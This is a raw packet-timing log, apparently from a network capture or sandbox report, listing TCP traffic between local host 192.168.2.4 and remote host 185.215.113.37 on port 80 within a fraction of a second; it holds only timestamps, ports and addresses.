Oct 10, 2024 18:23:19.276187897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276191950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276223898 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276334047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276343107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276360989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276367903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276372910 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276391029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276398897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276403904 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276436090 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276689053 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276727915 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276731968 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276741982 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276768923 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276838064 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276849031 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276865005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276879072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.276880980 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.276913881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277040005 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277060032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277071953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277074099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277087927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277097940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277107000 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277113914 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277127028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277143955 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277149916 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277175903 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277312040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277347088 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277404070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277414083 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277431965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277445078 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277446032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277462006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.277479887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.277508974 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.575695992 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.575733900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.575747967 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.575768948 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.575839043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.575856924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.575862885 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.575872898 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.575922966 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.575923920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.575983047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.575995922 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576011896 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576021910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576028109 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576083899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576083899 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576123953 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576138020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576179981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576179981 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576219082 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576229095 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576253891 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576272011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576272011 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576343060 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576353073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576375961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576383114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576383114 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576391935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576406956 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576420069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576422930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576422930 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576436043 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576479912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576479912 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576678991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576694012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576709032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576714039 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576729059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576740980 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576756001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576756954 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576757908 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576772928 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576783895 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576802015 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576814890 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576819897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576819897 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576832056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576853991 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576869965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.576870918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576870918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576916933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.576916933 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577173948 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577194929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577214003 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577296019 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577310085 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577327013 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577328920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577328920 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577338934 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577354908 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577370882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577370882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577460051 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577469110 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577491999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577502012 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577519894 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577519894 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577536106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577545881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577545881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577545881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577550888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577574968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577574968 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577682018 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577747107 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577761889 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577805996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577805996 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577893972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577904940 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577917099 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577931881 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.577936888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577950954 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577963114 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577979088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.577989101 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578006029 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578017950 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578017950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578017950 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578033924 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578052044 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578063965 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578066111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578066111 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578078032 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578095913 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578138113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578138113 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578628063 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578639030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578660011 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578670025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578675032 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578687906 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578700066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578716040 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578727961 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578739882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578739882 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578743935 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578756094 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578774929 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578787088 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578799963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578799963 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578803062 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578811884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578830004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578841925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578854084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578866005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578866005 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578874111 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578886986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578902006 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578913927 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578916073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578916073 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578932047 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.578989029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.578989029 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579586983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579602003 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579617977 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579627991 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579638004 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579649925 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579667091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579673052 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579684973 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579684973 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579688072 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579701900 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579718113 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579730034 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579740047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579740047 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579746008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579758883 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579776049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579787970 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579790115 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579790115 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579804897 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579813957 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579838037 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579842091 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579842091 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579850912 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579866886 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579879045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.579893112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579893112 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.579998016 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580539942 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580554008 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580570936 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580585957 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580590010 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580602884 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580625057 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580638885 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580646992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580646992 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580651045 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580667973 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580681086 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580691099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580691099 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580696106 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580712080 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580724001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580739975 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580749989 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580765009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580765009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580770016 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580780983 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580800056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580810070 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580811977 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580811977 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580826998 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580838919 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580853939 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.580862999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.580862999 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581160069 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581651926 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581665039 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581680059 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581691027 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581700087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581727028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581737995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581748009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581748009 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581756115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581769943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581783056 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581799030 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581810951 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581821918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581821918 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581825972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581844091 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581854105 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581871986 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581871986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581871986 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581887007 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581901073 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581918001 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.581940889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.581940889 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582006931 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582021952 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582036972 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582041979 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582041979 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582079887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582079887 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582494020 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582508087 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582523108 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582535028 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582550049 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582552910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582552910 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582570076 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582581997 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582597017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582611084 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582623959 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582629919 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582629919 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582639933 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582652092 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582668066 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582676888 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582684994 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582684994 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582693100 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582710981 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582720995 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582739115 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582745075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582745075 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582756042 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582772017 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582782030 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582783937 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582801104 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582813025 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582828999 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.582829952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582829952 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582880020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.582880020 CEST	49731	80	192.168.2.4	185.215.113.37
Oct 10, 2024 18:23:19.583337069 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583349943 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583365917 CEST	80	49731	185.215.113.37	192.168.2.4
Oct 10, 2024 18:23:19.583370924 CEST	49731	80	192.168.2.4	185.215.113.37
